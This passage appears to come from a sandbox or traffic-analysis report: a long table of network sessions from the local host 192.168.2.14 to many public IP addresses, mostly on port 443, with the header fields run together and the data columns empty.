                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17875192.168.2.145098289.243.130.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17876192.168.2.14600648.115.82.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17877192.168.2.143799453.109.24.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17878192.168.2.1442410174.16.241.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17879192.168.2.144508084.45.223.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17880192.168.2.145142872.54.189.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17881192.168.2.145223664.99.79.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17882192.168.2.1454754123.248.78.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17883192.168.2.1450864102.115.216.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17884192.168.2.1455654102.48.76.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17885192.168.2.143716089.64.99.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17886192.168.2.143410840.105.128.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17887192.168.2.1449054142.32.59.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17888192.168.2.145556649.142.198.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17889192.168.2.145022069.236.35.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17890192.168.2.145864447.224.87.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17891192.168.2.1458260130.174.232.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17892192.168.2.1456258209.190.198.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17893192.168.2.144161272.164.3.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17894192.168.2.145352840.64.246.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17895192.168.2.1456786143.190.184.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17896192.168.2.144137490.63.56.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17897192.168.2.1445054216.198.220.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17898192.168.2.144271218.179.99.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17899192.168.2.1433726177.237.202.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17900192.168.2.145611827.221.121.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17901192.168.2.1456318104.29.47.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17902192.168.2.144758887.252.235.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17903192.168.2.145564861.204.212.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17904192.168.2.1444476171.227.84.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17905192.168.2.1435016145.42.215.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17906192.168.2.1450532109.8.125.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17907192.168.2.1445658207.98.24.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17908192.168.2.145191495.228.166.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17909192.168.2.1440196174.232.73.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17910192.168.2.1437466139.176.93.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17911192.168.2.145049892.236.162.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17912192.168.2.1452792188.101.181.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17913192.168.2.1444812193.197.44.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17914192.168.2.145075882.210.225.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17915192.168.2.144418249.119.37.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17916192.168.2.143490272.204.161.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17917192.168.2.1436228108.165.122.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17918192.168.2.1434324120.180.55.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17919192.168.2.1445380137.41.39.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17920192.168.2.1460998143.190.112.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17921192.168.2.1458276108.60.110.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17922192.168.2.1454508160.152.81.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17923192.168.2.143469271.236.198.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17924192.168.2.1441150152.67.251.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17925192.168.2.1449474187.44.145.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17926192.168.2.1442664200.179.202.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17927192.168.2.144212076.222.221.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17928192.168.2.14437381.198.53.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17929192.168.2.145371212.4.79.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17930192.168.2.1451254159.197.134.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17931192.168.2.1440358199.73.77.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17932192.168.2.144874893.77.93.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17933192.168.2.143691863.133.178.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17934192.168.2.1440026107.18.194.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17935192.168.2.143426482.47.171.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17936192.168.2.143828831.193.123.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17937192.168.2.1459230169.252.34.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17938192.168.2.1446302152.83.37.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17939192.168.2.1436806206.1.158.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17940192.168.2.144697290.232.18.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17941192.168.2.1444400153.206.192.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17942192.168.2.145887875.126.27.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17943192.168.2.1449750105.51.202.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17944192.168.2.1437974183.201.200.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17945192.168.2.1456234163.82.208.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17946192.168.2.144258236.223.223.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17947192.168.2.1444296106.120.173.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17948192.168.2.143632254.132.98.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17949192.168.2.1445866116.177.40.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17950192.168.2.1460614218.73.86.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17951192.168.2.1455070111.71.37.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17952192.168.2.1447190138.159.186.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17953192.168.2.144374251.112.18.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17954192.168.2.1455790132.21.97.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17955192.168.2.1455568147.4.144.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17956192.168.2.1449008193.132.219.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17957192.168.2.1435754174.120.204.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17958192.168.2.1454472172.202.246.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17959192.168.2.144572661.230.249.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17960192.168.2.1453952135.128.114.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17961192.168.2.1437468223.253.39.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17962192.168.2.144259212.25.244.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17963192.168.2.1458816202.127.230.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17964192.168.2.144485247.142.126.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17965192.168.2.144171632.111.162.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17966192.168.2.1440372183.197.12.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17967192.168.2.144011414.178.92.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17968192.168.2.145564267.82.135.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17969192.168.2.1447124170.61.142.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17970192.168.2.145107482.25.253.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17971192.168.2.1456678106.147.208.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17972192.168.2.1448928203.211.147.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17973192.168.2.1443860155.239.87.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17974192.168.2.1445208138.97.117.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17975192.168.2.1459604211.60.144.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17976192.168.2.1441616145.254.68.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17977192.168.2.1457432118.252.50.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17978192.168.2.1434824109.190.79.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17979192.168.2.1446738222.36.209.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17980192.168.2.1443454113.240.109.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17981192.168.2.146047057.158.101.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17982192.168.2.1440010178.23.33.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17983192.168.2.1442162161.92.250.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17984192.168.2.1438428125.120.157.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17985192.168.2.1453130172.254.57.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17986192.168.2.1455356179.163.223.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17987192.168.2.1448120219.2.170.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17988192.168.2.1460070181.101.115.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17989192.168.2.144927247.150.15.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17990192.168.2.1453748137.252.8.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17991192.168.2.144419862.141.185.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17992192.168.2.146038895.146.14.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17993192.168.2.145030082.47.75.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17994192.168.2.1443862149.34.44.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17995192.168.2.1446618201.131.188.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17996192.168.2.1442554156.239.52.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17997192.168.2.143435262.159.143.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17998192.168.2.1455872209.53.59.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17999192.168.2.1437536129.90.88.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18000192.168.2.144983063.100.22.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18001192.168.2.1433424208.79.143.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18002192.168.2.1435090156.159.143.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18003192.168.2.1433336191.142.124.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18004192.168.2.145287499.2.161.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18005192.168.2.1448406156.32.64.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18006192.168.2.1434220187.129.59.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18007192.168.2.145420865.101.233.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18008192.168.2.144272098.216.136.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18009192.168.2.1444588119.115.124.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18010192.168.2.144308699.74.211.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18011192.168.2.1458730189.172.7.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18012192.168.2.1438168174.218.217.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18013192.168.2.145926491.124.203.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18014192.168.2.1439782142.107.20.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18015192.168.2.1439320222.169.68.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18016192.168.2.1452296125.67.164.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18017192.168.2.144783671.136.16.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18018192.168.2.1443484149.119.157.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18019192.168.2.1444332184.1.217.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18020192.168.2.1458666202.232.101.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18021192.168.2.145233890.156.26.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18022192.168.2.146036070.170.96.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18023192.168.2.1451934197.236.110.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18024192.168.2.1457634105.123.109.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18025192.168.2.1442212197.71.149.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18026192.168.2.1445342140.68.249.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18027192.168.2.145291423.248.39.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18028192.168.2.1450272154.152.202.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18029192.168.2.1432924199.72.82.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18030192.168.2.143872682.245.194.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18031192.168.2.143426670.5.205.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18032192.168.2.1435544192.142.212.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18033192.168.2.144677282.50.101.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18034192.168.2.1441702223.225.34.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18035192.168.2.145146468.216.15.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18036192.168.2.1459870136.176.226.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18037192.168.2.1454422125.30.1.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18038192.168.2.1440528145.63.208.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18039192.168.2.145208651.188.16.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18040192.168.2.1454392107.177.124.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18041192.168.2.1445108139.44.91.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18042192.168.2.144915468.204.36.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18043192.168.2.144732094.252.5.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18044192.168.2.1434354137.8.45.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18045192.168.2.144735899.65.206.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18046192.168.2.1457360171.3.161.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18047192.168.2.1454242129.181.100.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18048192.168.2.1455058107.254.133.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18049192.168.2.1450834115.99.248.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18050192.168.2.1438830103.190.142.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18051192.168.2.1459334109.202.69.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18052192.168.2.1437768135.192.9.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18053192.168.2.1452930116.122.244.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18054192.168.2.145718661.232.123.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18055192.168.2.145029282.62.95.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18056192.168.2.1452224122.112.32.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18057192.168.2.1454204156.68.12.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18058192.168.2.145860060.22.183.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18059192.168.2.1460594211.93.0.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18060192.168.2.1459690174.175.17.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18061192.168.2.1459728171.94.12.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18062192.168.2.144730694.123.80.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18063192.168.2.1449988105.9.95.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18064192.168.2.1442510119.90.231.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18065192.168.2.145636095.218.72.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18066192.168.2.143684467.253.56.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18067192.168.2.1457188118.179.158.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18068192.168.2.145122420.151.69.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18069192.168.2.1449094198.47.58.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18070192.168.2.1450404169.110.118.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18071192.168.2.145034489.9.249.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18072192.168.2.1453440142.87.229.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18073192.168.2.145696488.192.52.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18074192.168.2.1441902188.192.143.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18075192.168.2.1443888168.17.55.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18076192.168.2.1448574108.172.116.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18077192.168.2.1441206109.36.163.1848080
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18078192.168.2.145346837.103.119.1778080
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18079192.168.2.1444182208.14.64.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18080192.168.2.143324879.100.162.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18081192.168.2.1437098179.246.79.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18082192.168.2.145446682.225.55.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18083192.168.2.145689840.185.58.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18084192.168.2.1460000131.96.105.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18085192.168.2.1457552126.173.78.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18086192.168.2.1451424170.142.46.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18087192.168.2.145843838.207.210.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18088192.168.2.1435844105.202.132.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18089192.168.2.145533280.120.128.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18090192.168.2.1452912210.204.107.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18091192.168.2.1437816192.8.215.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18092192.168.2.1443838195.171.18.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18093192.168.2.1445778121.251.143.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18094192.168.2.144629458.215.192.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18095192.168.2.1441040115.206.203.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18096192.168.2.1454888197.2.147.123443
